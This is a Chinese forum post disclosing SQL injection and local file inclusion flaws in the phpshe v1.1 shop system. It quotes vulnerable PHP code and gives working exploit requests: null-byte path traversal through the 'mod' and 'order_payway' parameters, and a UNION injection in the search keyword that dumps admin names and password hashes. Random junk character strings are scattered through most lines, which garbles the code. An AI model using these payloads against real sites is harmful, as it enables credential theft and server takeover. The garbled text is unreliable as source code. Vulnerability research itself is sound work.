找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2631|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/& G* ?. [. I4 c& e6 Q1 z
/* Phpshe v1.1 Vulnerability
# P% A  B( K% S, n: J' \/* ========================
# C2 l# V" w; @, @+ g/* By: : Kn1f3% ^+ [8 U+ s$ |; m8 {: a! t
/* E-Mail : 681796@qq.com3 z' p( Y8 K6 G2 d" C/ F
/*******************************************************/
: u0 n# e0 z( d0×00 整体大概参数传输
+ c8 {, f' T+ X! L+ G+ E
% c6 l; [  E. f$ d/ x, m6 ]+ r
* y1 Y7 G' k; g

+ H  b9 C# o& V& T//common.php2 J! u1 u( i) m
if (get_magic_quotes_gpc()) {
  j: |' ~! a/ M!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');( n- B8 u( l( C" W
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');7 |! C! r8 U9 d) S# c% o
}+ _8 L' c+ E. y) o- `+ d
else {! s7 [& I9 m% q7 T7 s, @
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
( x: J" q& i/ u!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');- [" c- o/ U, x3 ~, H
}) n! f) W: X( e# W- V6 Z7 t1 [$ A
session_start();
. x6 c7 K( L: t$ o* L7 D/ u!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
1 g" D8 |) @, D  ~. ~% _! L2 y& H!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
- X  e- j5 V# o& U( H" F" z5 k$ n1 f4 v7 v0 U
0×01 包含漏洞0 R5 h1 N9 Y1 g7 V% f) `
1 r# H* o( M4 M
4 V$ g3 ]0 F4 n  n) {+ h
//首页文件
; x0 p! n) ?5 w& g7 h- B, O<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);9 \' m5 F" H, \" ]% f
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
* e2 v& K3 r2 c. Dpe_result();
: I% O* ], W. w$ T/ D; |?>; F* g' L$ C& y+ _5 k- W) ~
//common 文件 第15行开始" Y0 t3 o) |0 `! f3 }% y- z$ V
url路由配置( v/ W, M4 z5 M: y( z1 [
$module = $mod = $act = 'index';( Y2 _3 q$ o/ ?5 f+ S& {
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);6 d7 K8 q4 M$ w: @
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
7 A$ |+ e8 {; O$ \$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);% g$ z9 K5 r# ^3 f" q
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
3 G! t' Q- ^, S


3 s+ Q- `5 W2 T( _, ~5 g 3 D9 d' f" n" \, L
0×02 搜索注入
  N+ P% C- s% m& G5 g$ Q9 b' e; k! V
& T$ b6 z3 f6 S( S. }) |<code id="code2">

//product.php文件
! t- ^( ]5 `3 K# i, fcase 'list':
' v# ~) v& o7 p. {! I& L: B$category_id = intval($id);
# @" R0 j, b+ l: k; d) {$info = $db->pe_select('category', array('category_id'=>$category_id));! T! R! Q4 Z; b7 k: F6 ]
//搜索
% C4 ^/ \, l0 l8 q# D$sqlwhere = " and `product_state` = 1";9 G1 L* u* h0 Y. l- \
pe_lead('hook/category.hook.php');$ K2 P( E. t% ~* `# Z: ^# ~
if ($category_id) {
1 Q4 Y  {( R6 c' c$ Lwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
  L7 `: s* y0 }1 m( B}
7 J( E7 ~# J! X* X* M( _: v$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
& S0 v3 W$ O1 P9 |. J- w: H# vif ($_g_orderby) {
% F' ~3 I$ E- h2 @" d$orderby = explode('_', $_g_orderby);
0 J+ T* O( d) o: Q4 \$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";, o4 R+ C& S* H4 J. }* l# g
}. J6 Q1 U# a/ |$ D, e, o& k* W+ {- m3 N
else {# K1 I! E9 x1 L, H- h9 S3 L
$sqlwhere .= " order by `product_id` desc";' m  `* D' o* g
}  q- f% Q/ U  V% p0 m
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));7 U& q, v" E3 w! t: F, C
//热卖排行$ [" G) i6 ~8 I# d, x
$product_hotlist = product_hotlist();
, R; _6 W: v$ B//当前路径/ j+ k5 d) X: i' W
$nowpath = category_path($category_id);9 ]6 n2 j) a7 {/ E4 N: r
$seo = pe_seo($info['category_name']);
0 C0 S  ~1 i- }- t- v5 Qinclude(pe_tpl('product_list.html'));8 T4 |% n# p& i; C8 Q6 Y
//跟进selectall函数库: H  C0 K2 r& _$ J  q" p
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
/ g- D8 |& ]$ A4 x{
5 n6 o0 }2 l' s! y2 \2 v; }# ~( x//处理条件语句- {. H1 o* E& V
$sqlwhere = $this->_dowhere($where);
. ^6 o% y# |5 T- H6 r! i# Rreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);5 C; Z' J: ?. Y
}! c4 l% ^4 u0 {
//exp
1 _- H$ e. i) q: ~0 m& u* ~% Yproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
3 v% M- f* \! Y& f* q( Y9 ?

</code>
+ E' r/ w6 C1 N  n9 B. {- I" Q, J
1 L# p6 u: l, k; W8 B0 H0×03 包含漏洞2
1 ?: l- Q8 f0 i0 j  i7 d) L
% _8 w; L- n# n0 c( P$ P6 T1 F<code id="code3">

//order.php

case 'pay':

$ O7 i1 u! _) Z# P- {
$order_id = pe_dbhold($_g_id);


/ S, G: }/ r# ?4 U1 r1 J$cache_payway = cache::get('payway');


5 f1 J9 {6 s, @5 H5 [6 Kforeach($cache_payway as $k => $v) {


* W8 j8 u1 ?4 s( u7 m$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

3 r& ?' \2 j+ N3 e8 S9 O0 j
if ($k == 'bank') {

( h  e! q, t1 u. ~. P8 _
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


8 b, J0 u3 E- u8 _0 x0 {9 r  z6 g}

) e0 ]2 }/ |- x
}


9 v. O9 D8 M: j. X8 _( O" Z$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


) ?6 ]0 |+ Z6 ?: U!$order['order_id'] && pe_error('订单号错误...');


7 ?5 R" d9 D" o7 C  \if (isset($_p_pesubmit)) {


$ c6 U8 {3 V4 O8 ^0 P. z  uif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

" Y. v1 q" \* E6 P
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

; Z" ~6 y$ U9 [
foreach ($info_list as $v) {


( ]# P* G8 \. S/ Q$order['order_name'] .= "{$v['product_name']};";8 ^3 n7 u% q" r, M. u. s) j" R3 o

6 {% Y) ]+ Y  W
}


$ y; ^% h! s; d# {( e7 C/ Recho '正在为您连接支付网站,请稍后...';


1 g& k# a3 r4 j( [* i4 h% Y( qinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

( X  a7 {2 z& G/ |4 s$ Y
}//当一切准备好的时候就可以进行"鸡肋包含了"


+ E% n. \. d( b7 aelse {

* P  Q2 }# h% o( Z4 o: I
pe_error('支付错误...');


* S) ?5 V1 s4 j6 r! I4 n}

$ Q, z% L, Z2 N9 ?' p' g* Y% f- h
}

7 ]' K5 |9 Y. B: ^, ?8 A( J% t: S
$seo = pe_seo('选择支付方式');

% S( X, F+ C4 @4 i( t
include(pe_tpl('order_pay.html'));

+ f7 {0 ?* h4 [4 B* @  ]( C
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
- W  P$ {# J9 {8 v, d6 i0 Dhttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表